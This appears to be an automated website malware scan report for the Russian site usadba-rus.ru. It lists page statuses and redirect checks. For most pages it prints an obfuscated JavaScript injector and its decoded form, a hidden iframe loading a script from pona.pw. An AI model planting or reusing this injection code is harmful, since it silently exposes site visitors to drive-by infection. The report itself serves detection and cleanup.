Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usadba-rus.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://usadba-rus.ru/ | 200 OK Content-Length: 12920 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/media/system/js/core.js | 200 OK Content-Length: 4225 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/templates/versia2/jquery.js | 200 OK Content-Length: 91671 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/templates/versia2/script.js | 200 OK Content-Length: 7153 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/index.php/o-kompanii | 200 OK Content-Length: 17502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/prajs | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/novosti | 200 OK Content-Length: 12910 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/landshaftnyj-dizajn | 200 OK Content-Length: 11464 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/vodojomy | 200 OK Content-Length: 11411 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/vodojomy/oborudovanie | 200 OK Content-Length: 11467 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/nashi-proekty | 200 OK Content-Length: 15841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/kontakty | 200 OK Content-Length: 11924 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/test404page.js | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usadba-rus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 27 Jan 2015 16:09:32 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 21e75628f1cd7e79ea56ea6c97167af0=451b5bc02f444b67c9282d3b8f85f6ec; path=/
X-Powered-By: PHP/5.5.20
GET / HTTP/1.1
Host: usadba-rus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 27 Jan 2015 16:09:32 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 21e75628f1cd7e79ea56ea6c97167af0=451b5bc02f444b67c9282d3b8f85f6ec; path=/
X-Powered-By: PHP/5.5.20
Second query (visit from search engine):
GET / HTTP/1.1
Host: usadba-rus.ru
Referer: http://www.google.com/search?q=usadba-rus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: usadba-rus.ru
Referer: http://www.google.com/search?q=usadba-rus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.